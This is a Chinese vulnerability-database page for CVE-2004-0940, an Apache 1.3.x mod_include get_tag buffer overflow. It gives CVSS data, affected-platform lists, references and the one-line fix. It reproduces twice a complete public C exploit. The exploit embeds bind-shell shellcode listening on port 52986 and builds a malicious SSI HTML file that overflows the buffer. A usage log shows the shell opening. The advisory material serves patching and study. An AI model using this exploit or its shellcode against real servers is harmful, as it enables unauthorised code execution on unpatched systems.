CVE-2004-0940
CVSS6.9
发布时间 :2005-02-09 00:00:00
修订时间 :2016-10-17 22:50:02
NMCOEPS    

[原文]Buffer overflow in the get_tag function in mod_include for Apache 1.3.x to 1.3.32 allows local users who can create SSI documents to execute arbitrary code as the apache user via SSI (XSSI) documents that trigger a length calculation error.


[CNNVD]Apache mod_include本地缓冲区溢出漏洞(CNNVD-200502-029)

        mod_include是Apache标准模块允许用户在HTML中包含文件执行命令等。
        mod_include get_tag()对用户提交输入缺少充分过滤,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        问题是get_tag()函数存在缓冲区溢出问题,攻击者从handle_echo()函数可以触发,本地用户可以建立特殊的HTML,当Apache处理时,可能以httpd子进程权限执行任意代码。

- CVSS (基础分值)

CVSS分值: 6.9 [中等(MEDIUM)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: MEDIUM [漏洞利用存在一定的访问条件]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:apache:http_server:1.3.26Apache Software Foundation Apache HTTP Server 1.3.26
cpe:/o:slackware:slackware_linux:9.1Slackware Linux 9.1
cpe:/a:apache:http_server:1.3.27Apache Software Foundation Apache HTTP Server 1.3.27
cpe:/a:apache:http_server:1.3.28Apache Software Foundation Apache HTTP Server 1.3.28
cpe:/o:trustix:secure_linux:1.5Trustix Secure Linux 1.5
cpe:/a:apache:http_server:1.3.29Apache Software Foundation Apache HTTP Server 1.3.29
cpe:/a:apache:http_server:1.3.22Apache Software Foundation Apache HTTP Server 1.3.22
cpe:/a:apache:http_server:1.3.23Apache Software Foundation Apache HTTP Server 1.3.23
cpe:/o:slackware:slackware_linux:8.1Slackware Linux 8.1
cpe:/o:slackware:slackware_linux:9.0Slackware Linux 9.0
cpe:/a:apache:http_server:1.3.24Apache Software Foundation Apache HTTP Server 1.3.24
cpe:/a:apache:http_server:1.3.25Apache Software Foundation Apache HTTP Server 1.3.25
cpe:/o:suse:suse_linux:9.0::x86_64
cpe:/a:openpkg:openpkg:current
cpe:/a:apache:http_server:1.3.19Apache Software Foundation Apache HTTP Server 1.3.19
cpe:/a:apache:http_server:1.3.9Apache Software Foundation Apache HTTP Server 1.3.9
cpe:/a:apache:http_server:1.3.31Apache Software Foundation Apache HTTP Server 1.3.31
cpe:/a:apache:http_server:1.3.32Apache Software Foundation Apache HTTP Server 1.3.32
cpe:/o:hp:hp-ux:11.11HP-UX 11.11
cpe:/o:slackware:slackware_linux:current
cpe:/a:apache:http_server:1.3.17Apache Software Foundation Apache HTTP Server 1.3.17
cpe:/a:apache:http_server:1.3.18Apache Software Foundation Apache HTTP Server 1.3.18
cpe:/a:apache:http_server:1.3.7::dev
cpe:/a:apache:http_server:1.3.11Apache Software Foundation Apache HTTP Server 1.3.11
cpe:/a:apache:http_server:1.3.12Apache Software Foundation Apache HTTP Server 1.3.12
cpe:/a:openpkg:openpkg:2.2OpenPKG 2.2
cpe:/a:openpkg:openpkg:2.1OpenPKG 2.1
cpe:/a:apache:http_server:1.3.14Apache Software Foundation Apache HTTP Server 1.3.14
cpe:/a:openpkg:openpkg:2.0OpenPKG 2.0
cpe:/o:suse:suse_linux:8.1SuSE SuSE Linux 8.1
cpe:/o:suse:suse_linux:9.0SuSE SuSE Linux 9.0
cpe:/o:suse:suse_linux:8.0SuSE SuSE Linux 8.0
cpe:/a:apache:http_server:1.3.6Apache Software Foundation Apache HTTP Server 1.3.6
cpe:/o:slackware:slackware_linux:10.0Slackware Linux 10.0
cpe:/a:apache:http_server:1.3.20Apache Software Foundation Apache HTTP Server 1.3.20
cpe:/a:apache:http_server:1.3.4Apache Software Foundation Apache HTTP Server 1.3.4
cpe:/o:slackware:slackware_linux:8.0Slackware Linux 8.0
cpe:/o:hp:hp-ux:11.00HP-UX 11.00
cpe:/o:hp:hp-ux:11.22HP-UX 11i v1.6
cpe:/o:suse:suse_linux:9.2SuSE SuSE Linux 9.2
cpe:/a:apache:http_server:1.3.3Apache Software Foundation Apache HTTP Server 1.3.3
cpe:/o:hp:hp-ux:11.20HP-UX 11i v1.5
cpe:/a:apache:http_server:1.3Apache Software Foundation Apache HTTP Server 1.3
cpe:/a:apache:http_server:1.3.1Apache Software Foundation Apache HTTP Server 1.3.1
cpe:/o:suse:suse_linux:8.2SuSE SuSE Linux 8.2
cpe:/o:suse:suse_linux:9.1SuSE SuSE Linux 9.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0940
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0940
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200502-029
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109906660225051&w=2
(UNKNOWN)  OPENPKG  OpenPKG-SA-2004.047
http://securitytracker.com/id?1011783
(UNKNOWN)  SECTRACK  1011783
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102197-1
(UNKNOWN)  SUNALERT  102197
http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
(UNKNOWN)  CONFIRM  http://support.avaya.com/elmodocs2/security/ASA-2006-081.htm
http://www.apacheweek.com/features/security-13
(UNKNOWN)  CONFIRM  http://www.apacheweek.com/features/security-13
http://www.debian.org/security/2004/dsa-594
(UNKNOWN)  DEBIAN  DSA-594
http://www.mandriva.com/security/advisories?name=MDKSA-2004:134
(UNKNOWN)  MANDRAKE  MDKSA-2004:134
http://www.redhat.com/support/errata/RHSA-2004-600.html
(UNKNOWN)  REDHAT  RHSA-2004:600
http://www.redhat.com/support/errata/RHSA-2005-816.html
(UNKNOWN)  REDHAT  RHSA-2005:816
http://www.securityfocus.com/bid/11471
(VENDOR_ADVISORY)  BID  11471
http://www.vupen.com/english/advisories/2006/0789
(UNKNOWN)  VUPEN  ADV-2006-0789
http://xforce.iss.net/xforce/xfdb/17785
(VENDOR_ADVISORY)  XF  apache-modinclude-bo(17785)

- 漏洞信息

Apache mod_include本地缓冲区溢出漏洞
中危 缓冲区溢出
2005-02-09 00:00:00 2005-10-20 00:00:00
本地  
        mod_include是Apache标准模块允许用户在HTML中包含文件执行命令等。
        mod_include get_tag()对用户提交输入缺少充分过滤,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。
        问题是get_tag()函数存在缓冲区溢出问题,攻击者从handle_echo()函数可以触发,本地用户可以建立特殊的HTML,当Apache处理时,可能以httpd子进程权限执行任意代码。

- 公告与补丁

        目前厂商还没有提供补丁或者升级程序,建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        http://httpd.apache.org/

- 漏洞信息 (587)

Apache <= 1.3.31 mod_include Local Buffer Overflow Exploit (EDBID:587)
linux local
2004-10-21 Verified
0 xCrZx
N/A [点击下载]
/*********************************************************************************
 local exploit for mod_include of apache 1.3.x                                                                              *
 written by xCrZx /18.10.2004/                                                                                                   *
 bug found by xCrZx /18.10.2004/                                                                                              *
                                                                                                                                              *
 Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)                                                   *
                                                                                                                                              *
*********************************************************************************/

/*********************************************************************************
Technical Details:

there is an overflow in get_tag function:                                                                                 
                                                                                                            
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) 
{ 
... 
term = c; 
while (1) { 
GET_CHAR(in, c, NULL, p); 
[1] if (t - tag == tagbuf_len) { 
*t = '\0'; 
return NULL; 
} *
// Want to accept \" as a valid character within a string. // 
if (c == '\\') { 
[2] *(t++) = c; // Add backslash // 
GET_CHAR(in, c, NULL, p); 
if (c == term) { // Only if // 
[3] *(--t) = c; // Replace backslash ONLY for terminator // 
} 
} 
else if (c == term) { 
break; 
} 
[4] *(t++) = c; 
} 
*t = '\0'; 
... 

as we can see there is a [1] check to determine the end of tag buffer 
but this check can be skiped when [2] & [4] conditions will be occured
at the same time without [3] condition.

So attacker can create malicious file to overflow static buffer, on 
which tag points out and execute arbitrary code with privilegies of 
httpd child process. 

Fix: 
[1*] if (t - tag >= tagbuf_len-1) { 

Notes: To activate mod_include you need write "XBitHack on" in httpd.conf 

*********************************************************************************/

/*********************************************************************************
Example of work: 

[root@blacksand htdocs]# make 85mod_include 
cc 85mod_include.c -o 85mod_include 
[root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html 
[root@blacksand htdocs]# chmod +x evil.html 
[root@blacksand htdocs]# netstat -na|grep 52986 
[root@blacksand htdocs]# telnet localhost 8080 
Trying 127.0.0.1... 
Connected to localhost. 
Escape character is '^]'. 
GET /evil.html HTTP/1.0 
^] 
telnet> q 
Connection closed. 
[root@blacksand htdocs]# netstat -na|grep 52986 
tcp 0 0 0.0.0.0:52986 0.0.0.0:* LISTEN 
[root@blacksand htdocs]# 
*********************************************************************************/

/*********************************************************************************
Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always 
*********************************************************************************/

/*********************************************************************************
Personal hello to my parents :) 
*********************************************************************************/

/*********************************************************************************
Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz 
*********************************************************************************/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>

#define EVILBUF 8202
#define HTMLTEXT 1000

#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</html>"

#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"

int main(int argc, char **argv) {

char html[EVILBUF+HTMLTEXT];
char evilbuf[EVILBUF+1];

//can be changed
char shellcode[] =

// bind shell on 52986 port 
"\x31\xc0"
"\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
"\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
"\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
"\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
"\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
"\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";

//execve /tmp/sh <- your own program
/*
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
"\xc0\x88\x43\x07\x89\x5b\x08\x89"
"\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
"\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
"/tmp/sh";
*/


char NOP[] = "\x90\x40"; // special nops ;)
char evilpad[] = "\\CRZCRZCRZCRZC"; // trick ;)

int padding,xpad=0;
int i,fd;
long ret=0xbfff8688;

if(argc>1) ret=strtoul(argv[1],0,16);
else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exit(0); }

padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);

while(1) {
if(padding%2==0) { padding/=2; break;}
else {padding--;xpad++;}
}

memset(html,0x0,sizeof html);
memset(evilbuf,0x0,sizeof evilbuf);

for(i=0;i<padding;i++)
memcpy(evilbuf+strlen(evilbuf),&NOP,2);
for(i=0;i<xpad;i++)
memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);

memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
*(long*)&evilbuf[strlen(evilbuf)]=ret;

sprintf(html,HTML_FORMAT,evilbuf);

printf("%s",html);

return 0;
}

// milw0rm.com [2004-10-21]
		

- 漏洞信息 (24694)

Apache 1.3.x mod_include Local Buffer Overflow Vulnerability (EDBID:24694)
linux local
2004-10-18 Verified
0 xCrZx
N/A [点击下载]
source: http://www.securityfocus.com/bid/11471/info

The problem presents itself when the affected module attempts to parse mod_include-specific tag values. A failure to properly validate the lengths of user-supplied tag strings before copying them into finite buffers facilitates the overflow. 

A local attacker may leverage this issue to execute arbitrary code on the affected computer with the privileges of the affected Apache server.

/*********************************************************************************
 local exploit for mod_include of apache 1.3.x                                   *
 written by xCrZx                         /18.10.2004/                           *
 bug found by xCrZx                       /18.10.2004/                           *
                                                                                 *
 y0das old shao lin techniq ownz u :) remember my words                          *
 http://lbyte.ru/16-masta_killa-16-mastakilla-mad.mp3                            *
                                                                                 *
 Successfully tested on apache 1.3.31 under Linux RH9.0(Shrike)                  *
*********************************************************************************/
 
/*********************************************************************************
 Technical Details:                                                              *
                                                                                 *
 there is an overflow in get_tag function:                                       *
                                                                                 *
static char *get_tag(pool *p, FILE *in, char *tag, int tagbuf_len, int dodecode) *
{                                                                                *
...                                                                              *
    term = c;                                                                    *
    while (1) {                                                                  *
        GET_CHAR(in, c, NULL, p);                                                *
[1]        if (t - tag == tagbuf_len) {                                          *
            *t = '\0';                                                           *
            return NULL;                                                         *
        }                                                                        *
// Want to accept \" as a valid character within a string. //                    *
        if (c == '\\') {                                                         *
[2]            *(t++) = c;         // Add backslash //                           *
            GET_CHAR(in, c, NULL, p);                                            *
            if (c == term) {    // Only if //                                    *
[3]                *(--t) = c;     // Replace backslash ONLY for terminator //   *
            }                                                                    *
        }                                                                        *
        else if (c == term) {                                                    *
            break;                                                               *
        }                                                                        *
[4]        *(t++) = c;                                                           *
    }                                                                            *
    *t = '\0';                                                                   *
...                                                                              *
                                                                                 *
as we can see there is a [1] check to determine the end of tag buffer            *
but this check can be skiped when [2] & [4] conditions will be occured           *
at the same time without [3] condition.                                          *
                                                                                 *
So attacker can create malicious file to overflow static buffer, on              *
which tag points out and execute arbitrary code with privilegies of              *
httpd child process.                                                             *
                                                                                 *
Fix:                                                                             *
[1*]        if (t - tag >= tagbuf_len-1) {                                       *
                                                                                 *
Notes: To activate mod_include you need write "XBitHack on" in httpd.conf        *
                                                                                 *
*********************************************************************************/
 
/*********************************************************************************
  Example of work:                                                               *
                                                                                 *
  [root@blacksand htdocs]# make 85mod_include                                    *
  cc     85mod_include.c   -o 85mod_include                                      *
  [root@blacksand htdocs]# ./85mod_include 0xbfff8196 > evil.html                *
  [root@blacksand htdocs]# chmod +x evil.html                                    *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  [root@blacksand htdocs]# telnet localhost 8080                                 *
  Trying 127.0.0.1...                                                            *
  Connected to localhost.                                                        *
  Escape character is '^]'.                                                      *
  GET /evil.html HTTP/1.0                                                        *
  ^]                                                                             *
  telnet> q                                                                      *
  Connection closed.                                                             *
  [root@blacksand htdocs]# netstat -na|grep 52986                                *
  tcp        0      0 0.0.0.0:52986           0.0.0.0:*               LISTEN     *
  [root@blacksand htdocs]#                                                       *
*********************************************************************************/
 
/*********************************************************************************
  Notes: ha1fsatan - ti 4elovek-kakashka :))) be co0l as always                  *
*********************************************************************************/
 
/*********************************************************************************
  Personal hello to my parents :)                                                *
*********************************************************************************/
 
/*********************************************************************************
 Public shoutz to: m00 security, ech0 :), LByte, 0xbadc0ded and otherz           *
*********************************************************************************/
 
 
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
 
#define EVILBUF 8202
#define HTMLTEXT 1000
 
#define HTML_FORMAT "<html>\n<!--#echo done=\"%s\" -->\nxCrZx 0wn U\n</
html>"
 
#define AUTHOR "\n*** local exploit for mod_include of apache 1.3.x by xCrZx /18.10.2004/ ***\n"

 
int main(int argc, char **argv) {
 
	char html[EVILBUF+HTMLTEXT];
	char evilbuf[EVILBUF+1];
 
	//can be changed
	char shellcode[] =
 
    // bind shell on 52986 port 
    "\x31\xc0"
    "\x31\xdb\x53\x43\x53\x89\xd8\x40\x50\x89\xe1\xb0\x66\xcd\x80\x43"
    "\x66\xc7\x44\x24\x02\xce\xfa\xd1\x6c\x24\x04\x6a\x10\x51\x50\x89"
    "\xe1\xb0\x66\xcd\x80\x43\x43\xb0\x66\xcd\x80\x43\x89\x61\x08\xb0"
    "\x66\xcd\x80\x93\x31\xc9\xb1\x03\x49\xb0\x3f\xcd\x80\x75\xf9\x68"
    "\x2f\x73\x68\x20\x68\x2f\x62\x69\x6e\x88\x4c\x24\x07\x89\xe3\x51"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80";
 
    //execve /tmp/sh <- your own program
   /*
    "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
    "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
    "\xc0\x88\x43\x07\x89\x5b\x08\x89"
    "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
    "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
    "/tmp/sh";
   */
 
 
	char NOP[] = "\x90\x40";             // special nops ;)
	char evilpad[] = "\\CRZCRZCRZCRZC";  // trick ;)
 
	int padding,xpad=0;
	int i,fd;
	long ret=0xbfff8688;
 
	if(argc>1) ret=strtoul(argv[1],0,16);
	else { fprintf(stderr,AUTHOR"\nUsage: %s <RET ADDR> > file.html\n\n",argv[0]);exi
t(0); }
 
	padding=(EVILBUF-1-strlen(shellcode)-4-strlen(evilpad)+2);
 
	while(1) {
		if(padding%2==0) { padding/=2; break;}
		else {padding--;xpad++;}
	}
 
	memset(html,0x0,sizeof html);
	memset(evilbuf,0x0,sizeof evilbuf);
 
	for(i=0;i<padding;i++)
		memcpy(evilbuf+strlen(evilbuf),&NOP,2);
	for(i=0;i<xpad;i++)
		memcpy(evilbuf+strlen(evilbuf),(evilbuf[strlen(evilbuf)-1]==NOP[1])?(&NOP[0]):(&NOP[1]),1);

 
	memcpy(evilbuf+strlen(evilbuf),&shellcode,sizeof shellcode);
	memcpy(evilbuf+strlen(evilbuf),&evilpad,sizeof evilpad);
	*(long*)&evilbuf[strlen(evilbuf)]=ret;
 
	sprintf(html,HTML_FORMAT,evilbuf);
 
	printf("%s",html);
 
	return 0;
}		

- 漏洞信息 (F34887)

apache_1.3.33.tar.gz (PacketStormID:F34887)
2004-10-29 00:00:00
 
unix
CVE-2004-0492,CVE-2004-0940
[点击下载]

Apache is the most popular webserver on the Internet, quite possibly the best in terms of security, functionality, efficiency, and speed.

- 漏洞信息

11003
Apache HTTP Server mod_include get_tag() Function Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in the Apache HTTP server mod_include module (compiled in by default). The get_tag() function in mod_include.c contains a logic flaw resulting in a buffer overflow. A local attacker who is authorized to create server side include (SSI) files, can create a specially crafted HTML file and cause arbitrary code execution with the privileges of the httpd child process, resulting in a loss of integrity.

- 时间线

2004-10-21 2004-10-18
2004-10-24 Unknow

- 解决方案

Upgrade to Apache version 1.3.33 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): In the get_tag() function (mod_include.c), the following line should be changed from: if (t - tag == tagbuf_len) { to if (t - tag >= tagbuf_len-1) {

- 相关参考

- 漏洞作者

- 漏洞信息

Apache mod_include Local Buffer Overflow Vulnerability
Boundary Condition Error 11471
No Yes
2004-10-20 12:00:00 2006-08-16 04:35:00
Discovery of this issue is credited to Crazy Einstein <crazy_einstein@yahoo.com>.

- 受影响的程序版本

Trustix Secure Linux 1.5
Sun Solaris 9_x86
Sun Solaris 9
Sun Solaris 8_x86
Sun Solaris 8_sparc
Slackware Linux 10.0
Slackware Linux 9.1
Slackware Linux 9.0
Slackware Linux 8.1
Slackware Linux 8.0
Slackware Linux -current
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0
RedHat Stronghold 4.0
OpenPKG OpenPKG 2.2
OpenPKG OpenPKG 2.1
OpenPKG OpenPKG 2.0
OpenPKG OpenPKG Current
IBM HTTP Server 1.3.28 .1
IBM HTTP Server 1.3.28
IBM HTTP Server 1.3.26 .2
IBM HTTP Server 1.3.26 .1
IBM HTTP Server 1.3.26
IBM HTTP Server 1.3.19 .5
IBM HTTP Server 1.3.19 .4
IBM HTTP Server 1.3.19 .3
IBM HTTP Server 1.3.19 .2
IBM HTTP Server 1.3.19 .1
IBM HTTP Server 1.3.19
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- RedHat Linux 7.1
- S.u.S.E. Linux 7.1
- Sun Solaris 7.0
- Sun Solaris 2.6
IBM HTTP Server 1.3.12 .7
IBM HTTP Server 1.3.12 .6
IBM HTTP Server 1.3.12 .5
IBM HTTP Server 1.3.12 .4
- IBM AIX 4.3.3
- IBM AIX 5.1
- RedHat Linux 7.1
- S.u.S.E. Linux 7.2
IBM HTTP Server 1.3.12 .3
- HP HP-UX 11.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT 4.0 SP5
- Microsoft Windows NT 4.0 SP4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
- Sun Solaris 2.6
IBM HTTP Server 1.3.12 .2
- Caldera OpenLinux 2.4
- Caldera OpenLinux 2.3
- HP HP-UX 11.0
- IBM AIX 4.3.3
- Microsoft Windows NT 4.0
- RedHat Linux 6.2 sparc
- Sun Solaris 2.6
- Turbolinux Turbolinux 6.0
IBM HTTP Server 1.3.12 .1
IBM HTTP Server 1.3.12
IBM HTTP Server 1.3.6 win32
IBM HTTP Server 1.3.6 .4 win32
IBM HTTP Server 1.3.6 .3
- Caldera OpenLinux 2.2
- IBM AIX 4.2.1
- Microsoft Windows NT 4.0
- RedHat Linux 6.0 sparc
- RedHat Linux 5.2 sparc
- S.u.S.E. Linux 6.1
- S.u.S.E. Linux 6.0
- Sun Solaris 2.6
- Turbolinux Turbolinux 3.0.1
IBM HTTP Server 1.3.6 .2 win32
IBM HTTP Server 1.3.6 .2 unix
IBM HTTP Server 1.3.3 win32
IBM Hardware Management Console (HMC) for pSeries 4.0 R2.0
IBM Hardware Management Console (HMC) for pSeries 3.3.2
IBM Hardware Management Console (HMC) for iSeries 4.0 R2.0
IBM Hardware Management Console (HMC) for iSeries 3.3.2
HP Webproxy A.02.10
+ HP HP-UX B.11.04
HP Webproxy A.02.00
HP VirtualVault A.04.70
+ HP HP-UX B.11.04
HP VirtualVault A.04.60
+ HP HP-UX B.11.04
HP VirtualVault A.04.50
+ HP HP-UX B.11.04
HP HP-UX 11.22
HP HP-UX 11.20
HP HP-UX 11.11
HP HP-UX 11.0
HP HP-UX B.11.22
HP HP-UX B.11.11
HP HP-UX B.11.00
Avaya Network Routing
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya MN100
Avaya Intuity LX
Avaya Communication Manager 2.0.1
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 2.0
+ Avaya Communication Manager Server DEFINITY Server SI/CS
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8100
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 1.3.1
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R11
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Avaya Communication Manager 1.1
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R10
+ Avaya Communication Manager Server DEFINITY Server R11
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server DEFINITY Server R9
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8300
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8500
+ Avaya Communication Manager Server S8700
+ Avaya Communication Manager Server S8700
Apache Software Foundation Apache 1.3.32
+ Gentoo Linux 1.4
+ Gentoo Linux
Apache Software Foundation Apache 1.3.31
+ OpenPKG OpenPKG Current
Apache Software Foundation Apache 1.3.29
+ Apple Mac OS X 10.3.5
+ Apple Mac OS X 10.2.7
+ Apple Mac OS X Server 10.3.5
+ Apple Mac OS X Server 10.2.7
+ Mandriva Linux Mandrake 10.0 AMD64
+ Mandriva Linux Mandrake 10.0
+ OpenPKG OpenPKG 2.0
Apache Software Foundation Apache 1.3.28
+ Conectiva Linux 8.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ OpenBSD OpenBSD 3.4
+ OpenPKG OpenPKG 1.3
Apache Software Foundation Apache 1.3.27
+ HP HP-UX (VVOS) 11.0 4
+ HP VirtualVault 4.6
+ HP VirtualVault 4.5
+ HP Webproxy 2.0
+ Immunix Immunix OS 7+
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ OpenBSD OpenBSD 3.3
+ OpenPKG OpenPKG Current
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux Advanced Work Station 2.1
+ SGI IRIX 6.5.19
Apache Software Foundation Apache 1.3.26
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ Mandriva Linux Mandrake 9.0
+ OpenPKG OpenPKG 1.1
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
Apache Software Foundation Apache 1.3.25
Apache Software Foundation Apache 1.3.24
Apache Software Foundation Apache 1.3.23
- IBM AIX 4.3
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ RedHat Linux 7.3 i386
+ RedHat Linux 7.3
+ S.u.S.E. Linux 8.0 i386
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
Apache Software Foundation Apache 1.3.22
Apache Software Foundation Apache 1.3.20
- HP HP-UX 11.22
- HP HP-UX 11.20
+ MandrakeSoft Single Network Firewall 7.2
+ S.u.S.E. Linux 7.3 sparc
+ S.u.S.E. Linux 7.3 ppc
+ S.u.S.E. Linux 7.3 i386
+ S.u.S.E. Linux 7.3
+ SGI IRIX 6.5.18
+ SGI IRIX 6.5.17
+ SGI IRIX 6.5.16
+ SGI IRIX 6.5.15
+ SGI IRIX 6.5.14 m
+ SGI IRIX 6.5.14 f
+ SGI IRIX 6.5.14
+ SGI IRIX 6.5.13 m
+ SGI IRIX 6.5.13 f
+ SGI IRIX 6.5.13
+ SGI IRIX 6.5.12 m
+ SGI IRIX 6.5.12 f
+ SGI IRIX 6.5.12
+ Slackware Linux 8.0
+ Sun Cobalt Control Station 4100CS
+ Sun Cobalt RaQ 550
+ Sun Solaris 9_x86 Update 2
+ Sun Solaris 9_x86
+ Sun Solaris 9
+ Sun SunOS 5.9 _x86
+ Sun SunOS 5.9
Apache Software Foundation Apache 1.3.19
- Apple Mac OS X 10.0.3
- Caldera OpenLinux 2.4
+ Debian Linux 2.3
- Digital (Compaq) TRU64/DIGITAL UNIX 5.0
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 g
- Digital (Compaq) TRU64/DIGITAL UNIX 4.0 f
+ EnGarde Secure Linux 1.0.1
- FreeBSD FreeBSD 4.2
- FreeBSD FreeBSD 3.5.1
- HP HP-UX 11.11
- HP HP-UX 11.0 4
- HP HP-UX 11.0
- HP HP-UX 10.20
+ HP Secure OS software for Linux 1.0
- HP VirtualVault 4.5
+ Mandriva Linux Mandrake 8.1
- Mandriva Linux Mandrake 8.0
- Mandriva Linux Mandrake 7.2
- Mandriva Linux Mandrake 7.1
- NetBSD NetBSD 1.5.1
- NetBSD NetBSD 1.5
+ OpenBSD OpenBSD 2.9
- OpenBSD OpenBSD 2.8
+ OpenBSD OpenBSD 3.0
- Red Hat Linux 6.2
- RedHat Linux 7.1
- RedHat Linux 7.0
+ S.u.S.E. Linux 7.2 i386
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1 x86
+ S.u.S.E. Linux 7.1 sparc
